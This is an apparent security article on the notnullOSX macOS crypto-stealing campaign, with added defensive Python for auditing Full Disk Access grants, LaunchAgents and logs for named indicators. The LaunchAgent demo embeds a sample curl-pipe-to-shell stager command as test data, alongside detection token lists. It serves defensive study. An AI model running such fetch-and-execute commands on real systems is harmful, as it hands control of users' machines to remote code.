notnullOSX Malware: Fake Apps Steal Crypto on macOS

A dangerous new macOS cryptocurrency malware campaign has emerged in 2026, delivering a highly targeted stealer known as notnullOSX—built specifically to drain crypto wallets holding more than $10,000.

The malware abuses trusted platforms like fake wallpaper apps, Google Docs, and even a hijacked YouTube channel tied to Google services to trick Mac users into self-infecting their devices.

What makes this attack particularly alarming is not just the sophistication—but the psychological manipulation behind it.

In this article, you’ll learn:

  • How the notnullOSX malware attack works
  • Why macOS users are being specifically targeted
  • The infection chain from fake apps to full system compromise
  • Real-world impact on crypto wallets and credentials
  • How to defend against this evolving threat

What Is notnullOSX Malware?

notnullOSX is a Go-based macOS information stealer designed to:

  • Steal cryptocurrency wallet data
  • Harvest browser credentials
  • Extract messaging app data
  • Maintain persistent remote access

It is primarily aimed at macOS users holding significant crypto assets.

Primary Targets

  • Bitcoin Core wallets
  • Exodus and Electrum wallets
  • Ledger Live users
  • Telegram sessions
  • Browser-stored passwords and cookies

How the Attack Campaign Works

The campaign is not random—it is manually targeted and highly curated.

Target Selection Process

Attackers reportedly:

  • Identify victims with wallets exceeding $10,000
  • Collect social media profiles
  • Map wallet addresses and balances
  • Prioritize high-value individuals

Key Insight:
This is not mass malware—it is selective financial targeting.


Infection Chain Overview

The attack uses a multi-stage social engineering strategy:

1. Fake Google Document Trap

Victims receive a “protected document” showing:

  • Fake encryption error
  • False “Google API Connector” warning
  • Two “fix” options

Both options lead to malware installation.


2. ClickFix Terminal Attack

Users are tricked into running a Terminal command that:

  • Downloads a malicious script via curl
  • Installs a Mach-O binary
  • Disables Apple Gatekeeper protections
  • Registers persistence via LaunchAgent

Then users are asked to enable Full Disk Access.


Why This Is Critical

Granting Full Disk Access bypasses:

  • macOS Transparency, Consent, and Control (TCC) system
  • App-level permission prompts
  • Data protection controls

At that point, the malware can access:

  • Messages
  • Notes
  • Safari cookies
  • Keychains

3. Fake Wallpaper App (WallSpace)

A second infection path uses a fake app:

  • “WallSpace.app” wallpaper utility
  • Disguised macOS DMG file
  • Includes README + installer script

When executed, it installs the same malware payload.


YouTube as a Malware Delivery Weapon

Attackers also abused a compromised, long-established YouTube channel tied to Google services to steer viewers toward the malware.

What Made It Dangerous

  • Created in 2015 (aged, trusted account)
  • Suddenly gained 50,000+ views in days
  • Used to redirect users to malware sites

Security Signal:
A sudden spike in engagement on old accounts is often a sign of compromise.


What Happens After Infection

Once installed, notnullOSX operates silently in the background.

Data It Steals

  • iMessages and Notes
  • Safari cookies and sessions
  • Browser passwords
  • Telegram sessions
  • Crypto wallet data

Advanced Module: ReplaceApp

One of the most dangerous features is ReplaceApp, which:

  • Replaces Ledger Live with fake versions
  • Captures seed phrases during wallet setup
  • Operates without visible UI changes

Key Risk:
Hardware wallet users assume safety—but seed phrase interception breaks that trust model.


Persistence and Remote Control

The malware maintains:

  • Persistent LaunchAgent execution
  • Full disk monitoring access
  • Live command-and-control connection

This allows attackers to:

  • Push new commands
  • Update payloads
  • Steal additional data over time

Technical Breakdown of the Payload

  • Written in Go
  • Multi-architecture Mach-O binary (Intel + Apple Silicon)
  • ~27.74 MB in size
  • Low detection rate at discovery

At initial analysis:

  • Only ~10/64 antivirus engines detected it

Key Insight:
Signature-based detection alone is insufficient for modern macOS threats.


Common Attack Mistakes Users Fall For

1. Trusting Terminal Commands

Users often execute:

  • Base64-decoded commands
  • curl-based installers
  • “fix scripts” from documents

2. Granting Full Disk Access Blindly

Attackers exploit urgency and confusion to bypass macOS protections.


3. Fake App Installation Trust

DMG-based installers appear legitimate but hide malicious scripts.


Best Practices to Defend Against notnullOSX

1. Never Trust Terminal Commands from External Sources

Avoid commands from:

  • Websites
  • Documents
  • YouTube descriptions

2. Restrict Full Disk Access

Only grant to:

  • Verified applications
  • Known developers
  • Signed software
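One way to make the second practice checkable, as an added example that is not code from the original article: list which clients currently hold Full Disk Access and compare them against an allow-list, so a grant coerced out of a user stands out. On a real Mac the grants live in the system TCC database at /Library/Application Support/com.apple.TCC/TCC.db, in its access table, and reading that file itself requires Full Disk Access or root. The column subset, the meaning of auth_value (2 = allowed on macOS 11 and later), the client_type convention (0 = bundle id, 1 = path), the allow-list and every sample row below are assumptions constructed for the demo; verify them against your macOS version before relying on the query.

```python
"""List which clients currently hold Full Disk Access, so unexpected grants stand out.

Added example, not from the original article. The schema subset, auth_value
meaning, allow-list and sample rows are assumptions for the demo.
"""
import sqlite3

FDA_SERVICE = "kTCCServiceSystemPolicyAllFiles"   # TCC service name for Full Disk Access
AUTH_ALLOWED = 2                                   # assumption: 2 = allowed (macOS 11+)

# Assumption: bundle identifiers the organisation has vetted for Full Disk Access.
EXPECTED_FDA_CLIENTS = {"com.example.backup-agent", "com.example.edr-sensor"}


def fda_grants(conn):
    """Return [(client, client_type)] for every client currently allowed Full Disk Access."""
    rows = conn.execute(
        "SELECT client, client_type FROM access "
        "WHERE service = ? AND auth_value = ? ORDER BY client",
        (FDA_SERVICE, AUTH_ALLOWED),
    )
    return [(client, ctype) for client, ctype in rows]


def unexpected_grants(conn, expected=EXPECTED_FDA_CLIENTS):
    """Grants outside the allow-list: this is where a coerced grant would show up."""
    return [(c, t) for c, t in fda_grants(conn) if c not in expected]


def build_demo_db():
    """In-memory stand-in for TCC.db with a minimal 'access' table and constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access ("
        "service TEXT, client TEXT, client_type INTEGER, auth_value INTEGER)"
    )
    rows = [
        # (service, client, client_type, auth_value); all constructed
        (FDA_SERVICE, "com.example.backup-agent", 0, 2),                   # vetted
        (FDA_SERVICE, "com.example.edr-sensor", 0, 2),                     # vetted
        (FDA_SERVICE, "com.apple.Terminal", 0, 2),                         # user enabled it for a "fix" command
        (FDA_SERVICE, "/Users/demo/Applications/WallSpace.app", 1, 2),    # unknown app, granted by path
        (FDA_SERVICE, "com.example.old-tool", 0, 0),                       # denied, must not be listed
        ("kTCCServiceCamera", "com.example.video", 0, 2),                  # different service, ignored
    ]
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?)", rows)
    conn.commit()
    return conn


if __name__ == "__main__":
    demo = build_demo_db()
    for client, ctype in unexpected_grants(demo):
        print(f"unexpected Full Disk Access grant: {client} (client_type={ctype})")
```

To run the same query against a live system database instead of the demo, open it read-only with `sqlite3.connect("file:/Library/Application Support/com.apple.TCC/TCC.db?mode=ro", uri=True)` from a process that already has Full Disk Access, and treat any grant to a Terminal, a script runner or an app you did not deploy as something to review with the user rather than as an automatic verdict.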

3. Monitor macOS Persistence Locations

Regularly inspect:

  • ~/Library/LaunchAgents/
  • /tmp/ directory
  • Unknown Mach-O binaries
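The following is an added example, not code from the original article, that turns the three inspection points above into a repeatable audit: it parses every plist in a LaunchAgents directory, flags command lines with stager traits (curl, base64, a shell wrapper, a /tmp path), flags executables that live in temporary or hidden directories, and, for those, reads the Mach-O header to report whether the file is a universal (Intel + Apple Silicon) binary like the payload described above. The trusted-path list, the token list, the agent labels and the sample plists are constructed assumptions for the demo; the magic values and fat-header layout come from Apple's mach-o/loader.h and mach-o/fat.h.

```python
"""Audit a LaunchAgents directory for persistence traits described above.

Added example, not from the original article. Suspicious-token and
suspicious-directory lists, labels and sample plists are assumptions.
"""
import plistlib
import struct
import tempfile
from pathlib import Path

# On-disk magic bytes: the fat header is big-endian, thin 64/32-bit headers are
# stored little-endian on Intel and Apple Silicon, hence the reversed bytes.
FAT_MAGIC = b"\xca\xfe\xba\xbe"
THIN_MAGICS = {b"\xcf\xfa\xed\xfe": "64-bit Mach-O", b"\xce\xfa\xed\xfe": "32-bit Mach-O"}
CPU_TYPES = {0x01000007: "x86_64", 0x0100000C: "arm64"}

# Heuristics (assumptions): command-line traits and payload locations that a
# legitimate per-user LaunchAgent rarely uses.
SUSPICIOUS_TOKENS = ("curl ", "base64", "/tmp/", "sh -c")
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def macho_info(path):
    """Describe the Mach-O at path (e.g. 'universal Mach-O: x86_64+arm64') or None."""
    try:
        head = Path(path).read_bytes()[:4096]
    except OSError:
        return None
    if head[:4] in THIN_MAGICS:
        return THIN_MAGICS[head[:4]]
    if head[:4] != FAT_MAGIC or len(head) < 8:
        return None
    nfat = struct.unpack(">I", head[4:8])[0]
    if nfat > 16:  # Java class files share this magic; real fat binaries have few slices
        return None
    archs = []
    for i in range(nfat):
        off = 8 + i * 20  # struct fat_arch: cputype, cpusubtype, offset, size, align
        if off + 20 > len(head):
            break
        cputype = struct.unpack(">I", head[off:off + 4])[0]
        archs.append(CPU_TYPES.get(cputype, hex(cputype)))
    return "universal Mach-O: " + "+".join(archs)


def _is_hidden_path(exe):
    """True if any directory or file component below the root starts with a dot."""
    return any(part.startswith(".") for part in Path(exe).parts[1:])


def audit_launch_agents(agents_dir):
    """Return [(plist name, label, [reasons])] for every plist that looks suspicious."""
    findings = []
    for plist_path in sorted(Path(agents_dir).glob("*.plist")):
        try:
            with open(plist_path, "rb") as fh:
                data = plistlib.load(fh)
        except Exception as exc:  # an unparseable plist is itself worth a look
            findings.append((plist_path.name, "", [f"unparseable plist: {exc}"]))
            continue
        args = [str(a) for a in data.get("ProgramArguments", [])]
        program = data.get("Program")
        exe = str(program) if program else (args[0] if args else "")
        cmdline = " ".join(([str(program)] if program else []) + args)
        reasons = [f"command line contains {t.strip()!r}" for t in SUSPICIOUS_TOKENS if t in cmdline]
        if exe and (exe.startswith(SUSPICIOUS_DIRS) or _is_hidden_path(exe)):
            kind = macho_info(exe)
            reasons.append(f"executable in unusual location: {exe}" + (f" ({kind})" if kind else ""))
        if reasons and data.get("RunAtLoad"):
            reasons.append("RunAtLoad is set, so it runs at every login")
        if reasons:
            findings.append((plist_path.name, str(data.get("Label", "")), reasons))
    return findings


def build_demo_dir():
    """Create a throwaway LaunchAgents directory: one benign and two constructed suspicious agents."""
    root = Path(tempfile.mkdtemp(prefix="launchagents-demo-"))
    agents = root / "LaunchAgents"
    agents.mkdir()
    # Constructed fat-header stub (two slices, x86_64 + arm64) standing in for an unknown binary.
    payload = root / ".cache" / ".helper"
    payload.parent.mkdir()
    payload.write_bytes(FAT_MAGIC + struct.pack(">I", 2)
                        + struct.pack(">5I", 0x01000007, 3, 0x4000, 0, 14)
                        + struct.pack(">5I", 0x0100000C, 0, 0x8000, 0, 14))
    samples = {  # labels and paths are constructed, not real indicators
        "com.example.updater.plist": {
            "Label": "com.example.updater",
            "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/Example", "--check"],
            "RunAtLoad": True},
        "com.apple.update.service.plist": {  # Apple-lookalike label running a curl stager
            "Label": "com.apple.update.service",
            "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL https://example.invalid/stage | sh"],
            "RunAtLoad": True},
        "com.wallspace.helper.plist": {  # hidden-directory universal binary
            "Label": "com.wallspace.helper", "Program": str(payload),
            "RunAtLoad": True, "KeepAlive": True},
    }
    for name, content in samples.items():
        with open(agents / name, "wb") as fh:
            plistlib.dump(content, fh)
    return agents


if __name__ == "__main__":
    for name, label, reasons in audit_launch_agents(build_demo_dir()):
        print(f"{name} ({label}):\n  " + "\n  ".join(reasons))
```

On a real machine call `audit_launch_agents(Path.home() / "Library" / "LaunchAgents")` and, for a system-wide sweep, the same over /Library/LaunchAgents and /Library/LaunchDaemons with root; treat a hit as a lead to confirm with `launchctl list` and the binary's signature, since a vendor's agent can legitimately use a helper outside /Applications.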

4. Block Known Malicious Indicators

Security teams should monitor:

  • firebaseio.com C2 endpoints
  • cdn.filestackcontent.com downloads
  • Suspicious LaunchAgent creation
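As an added example, not code from the original article, here is detection logic for the two network indicators above run over constructed DNS and proxy log lines. It matches a domain only as an exact name or as a parent of the queried host, so notfirebaseio.com and firebaseio.com.example.invalid do not fire, and it groups hits by client so the noisiest endpoint is triaged first. The log format, client addresses and hostnames are constructed; only the two domains come from the article. Both are legitimate shared services, so a hit is a triage lead (which process, which user, is this expected here?) rather than proof of infection, which is why the article says to monitor them.

```python
"""Flag the network indicators named above in DNS or proxy log lines.

Added example, not from the original article. Log format and sample lines
are constructed; the watched domains are the ones the article names.
"""
import re

WATCHED_DOMAINS = ("firebaseio.com", "cdn.filestackcontent.com")

# A hostname: one or more dotted labels followed by an alphabetic TLD.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)

# Constructed sample log: mixed DNS query and proxy access lines.
SAMPLE_LOG = """\
2026-03-02T10:14:03Z dns client=192.0.2.23 q=www.apple.com type=A
2026-03-02T10:14:09Z dns client=192.0.2.23 q=project-demo-12345.firebaseio.com type=A
2026-03-02T10:14:10Z proxy client=192.0.2.23 GET https://cdn.filestackcontent.com/AbCdEf123 ua=curl/8.4.0
2026-03-02T10:15:41Z dns client=192.0.2.45 q=notfirebaseio.com type=A
2026-03-02T10:16:00Z dns client=192.0.2.45 q=firebaseio.com.example.invalid type=A
"""


def domain_matches(host, watched=WATCHED_DOMAINS):
    """Return the watched domain that host equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for domain in watched:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def scan_log(lines, watched=WATCHED_DOMAINS):
    """Return [(line_no, host, indicator)] for each line mentioning a watched domain."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        for host in HOST_RE.findall(line):
            indicator = domain_matches(host, watched)
            if indicator:
                hits.append((line_no, host.lower(), indicator))
                break  # one hit per line is enough for triage
    return hits


def hosts_by_client(lines, watched=WATCHED_DOMAINS):
    """Group matched hosts by the client address so one noisy endpoint is obvious."""
    grouped = {}
    for line_no, host, _indicator in scan_log(lines, watched):
        match = re.search(r"client=(\S+)", lines[line_no - 1])
        client = match.group(1) if match else "?"
        grouped.setdefault(client, []).append(host)
    return grouped


if __name__ == "__main__":
    sample = SAMPLE_LOG.splitlines()
    for line_no, host, indicator in scan_log(sample):
        print(f"line {line_no}: {host} matches {indicator}")
    for client, hosts in hosts_by_client(sample).items():
        print(f"{client}: {len(hosts)} hit(s)")
```

Feed real export lines in with `scan_log(path.read_text().splitlines())`; pair any hit with the LaunchAgent audit on the same endpoint, since a download from the CDN followed by a new agent plist is a much stronger signal than either alone.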

5. Enforce Crypto Security Hygiene

  • Use hardware wallets with verified software
  • Never install wallet tools from unofficial sources
  • Store seed phrases offline

Expert Insight: Why This Attack Is Dangerous

1. Social Engineering Over Exploits

No zero-day needed—just user trust manipulation.


2. macOS Is Becoming a Crypto Target

Historically “safer” perception is being exploited.


3. Security Tools Lag Behind

Low detection rates show:

  • Signature-based AV is insufficient
  • Behavioral detection is critical

Risk Impact Analysis

Severity: Critical

  • Direct financial theft potential
  • Full system compromise
  • Long-term persistence

Business Impact

  • Loss of crypto assets
  • Credential compromise
  • Enterprise macOS exposure

FAQs

1. What is notnullOSX malware?

It is a macOS crypto-stealing malware targeting users with significant digital asset holdings.


2. How does the malware spread?

Through fake wallpaper apps, phishing Google Docs, and hijacked YouTube channels.


3. What does it steal?

Crypto wallets, passwords, browser data, and messaging app sessions.


4. Why is Full Disk Access dangerous?

It bypasses macOS security prompts and allows unrestricted data access.


5. Can antivirus detect it?

Early versions had low detection rates across major antivirus engines.


6. Who is targeted?

Primarily macOS users with cryptocurrency holdings over $10,000.


Conclusion

The notnullOSX campaign shows how modern malware no longer relies on system exploits—it relies on human trust exploitation at scale.

Key Takeaways:

  • macOS users are high-value crypto targets
  • Fake apps and trusted platforms are being weaponized
  • Full Disk Access is a critical security boundary
  • Social engineering is now the primary attack vector

Final Thought:
In today’s threat landscape, the biggest vulnerability isn’t your system—it’s your trust.
